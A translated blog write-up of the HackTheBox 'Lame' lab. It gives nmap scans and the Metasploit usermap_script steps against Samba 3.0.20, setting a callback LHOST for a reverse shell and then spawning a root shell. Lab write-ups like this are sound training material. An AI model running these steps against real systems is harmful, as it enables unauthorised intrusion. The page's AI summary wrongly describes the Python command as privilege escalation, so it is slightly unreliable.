Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Lame] WriteUp

12
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The write-up details a penetration testing exercise on the HackTheBox "Lame" machine, which is categorized as easy. The author begins by scanning the target IP (10.10.10.3) using Nmap, revealing open ports for FTP, SSH, and Samba services. Notably, Samba version 3.0.20 is identified, which is vulnerable. The author then uses Metasploit to exploit this vulnerability with the `usermap_script` module, successfully gaining a shell. By executing a Python command, they escalate to root privileges and retrieve the flag, indicating successful exploitation.

HackTheBox [Lame] WriteUp#

image

GetShell#

nmap 10.10.10.3 -sT -Pn --top-ports 1000

PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Scanning the ports, I found the above ports open. Following the clues, I discovered that vsftpd 2.3.4 has a vulnerability with a smiley face, but it cannot be exploited.

Using nmap to further scan the Samba service.

nmap 10.10.10.3 -sT -sV -Pn -p 139,445 --script smb-os-discovery

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-05-07T04:36:46-04:00

Found the version number 3.0.20 and other information.

Used MSF to search for vulnerabilities.

msfconsole
search Samba 3.0.20
use multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.45

The exploit was successful, and I used python to enter the shell.

python -c 'import pty;pty.spawn("/bin/bash")'

I found that I was already the root user and successfully obtained the flag.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.